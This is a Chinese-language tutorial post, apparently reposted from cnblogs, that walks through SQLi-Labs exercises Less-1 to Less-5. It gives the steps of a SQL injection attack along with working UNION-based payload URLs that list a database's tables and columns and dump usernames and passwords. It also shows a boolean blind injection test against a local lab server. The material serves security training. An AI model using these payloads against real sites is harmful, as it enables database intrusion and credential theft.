其他分享
首页 > 其他分享> > Page-1 (Basic Injections)

Page-1 (Basic Injections)

作者:互联网

SQLi-Labs--Page-1 (Basic Injections)

SQL注入流程:

  1. 判断是否存在注入点
  2. 判断查询字段数(order by)
  3. 判断回显点(union select)
  4. 查询(当前)数据库
  5. 查询数据库中的表
  6. 查询字段名
  7. 获取表中数据

Less-1:单引号闭合(字符型)

单引号闭合,进行注释,页面回显正常

and 1=1/and 1=2判断注入点

判断字段数order by

union select联合查询判断回显点

查询数据库,当前用户

查询数据表
http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() -- qwe

查询users表中字段
http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' -- qwe

获取字段数据
http://127.0.0.1/sqli/Less-1/?id=-1' union select 1,username,password from users limit 1,1 -- qwe

Less2:数字型

判断存在注入


后续操作与Less-1相同,不在叙述。

Less-3:单引号+括号

单引号和括号闭合,注释,页面回显正常

and 1=1/and 1=2判断注入点,存在注入

Less4:双引号+括号

双引号+口号闭合,注释,页面回显正常。

判断注入点

Less5:单引号(盲注)

单引号闭合,注释,根据页面返回正确与否,判断注入点。

判断数据库名的长度,页面返回正常,数据库名长度为8
http://127.0.0.1/sqli/Less-5/?id=1' and length(database())=8 -- qwe

标签:Injections,判断,Less,union,单引号,--,Basic,Page,select
来源: https://www.cnblogs.com/clown-b/p/13627506.html